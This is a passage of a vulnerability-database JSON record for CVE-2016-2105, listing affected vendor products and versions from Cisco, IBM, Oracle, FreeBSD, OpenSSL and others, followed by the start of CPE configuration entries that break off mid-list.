"digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "9.3-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "security proventia network active bypass 0343c3c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "cloud manager with openstack interim fix1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "unified ip phones 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11.0(0.98000.225)" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.2.0" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "websphere application server liberty profile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.4" }, { "model": "unity connection", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.98991.13)" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "abyp-10g-2sr-2lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "prime optical for sps", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50008.3" }, { "model": "10.1-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.12-04" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.1" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.18" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server ssl gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.6" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.10000.5)" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "tivoli composite application manager for transactions if37", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "prime license manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "netezza platform software 7.2.1.1-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-42" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.8" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "abyp-4t-0s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.2" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "virtual security gateway for microsoft hyper-v vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "connected grid router cgos 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2.3" }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.12-01" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.4" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.9" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.3-release-p39", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-114" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "spa232d multi-line dect ata", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.2" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.014-08" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.21" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "globalprotect agent", "scope": "ne", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.1" }, { "model": "dcm series 9900-digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "19.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "10.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1876" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "10.3-release-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9951" }, { "model": "local collector appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.12" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.32" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "netezza platform software 7.2.1.2-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "connected analytics for collaboration", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.1" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.16" }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016" }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.1" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.8" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.4-12" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder 10.5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "qradar siem mr2 patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.113" }, { "model": "nexus", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "900012.0" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7(0)" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "services analytic platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79009.4(2)" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.17" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "tivoli netcool system service monitors", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "unified series ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "video surveillance media server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.9" }, { "model": "unified communications manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "security network controller 1.0.3376m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.28" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.7" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "project openssl 1.0.2h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.33" }, { "model": "10.2-release-p16", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "policy suite", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified communications manager session management edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.1" }, { "model": "anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.4.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "9.3-release-p34", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "tivoli provisioning manager for images system edition build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.20290.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.42" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.10" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "webex meetings server mr1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.99.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "abyp-2t-0s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.1" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "asa cx and cisco prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.35" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.5" }, { "model": "9.3-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2.1" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.13900.9)" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(0.98000.88)" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "89757" }, { "db": "JVNDB", "id": "JVNDB-2016-002472" }, { "db": "CNNVD", "id": "CNNVD-201605-081" }, { "db": "NVD", "id": "CVE-2016-2105" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "5.6.30", "versionStartIncluding": "5.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:mysql:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "5.7.12", "versionStartIncluding": "5.7.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.11.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 